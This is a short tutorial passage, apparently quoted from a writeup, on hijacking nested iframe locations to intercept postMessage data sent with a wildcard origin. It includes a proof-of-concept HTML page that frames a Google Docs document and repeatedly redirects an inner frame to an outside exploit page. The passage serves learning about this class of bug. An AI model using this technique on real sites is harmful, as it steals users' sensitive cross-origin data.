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According to this writeup, if you can iframe a webpage without X-Frame-Header that contains another iframe, you can change the location of that child iframe.
For example, if abc.com have efg.com as iframe and abc.com didn't have X-Frame header, I could change the efg.com to evil.com cross origin using, frames.location
.
This is specially useful in postMessages because if a page is sending sensitive data using a wildcard like windowRef.postmessage("","*")
it's possible to change the location of the related iframe (child or parent) to an attackers controlled location and steal that data.
<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);
function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
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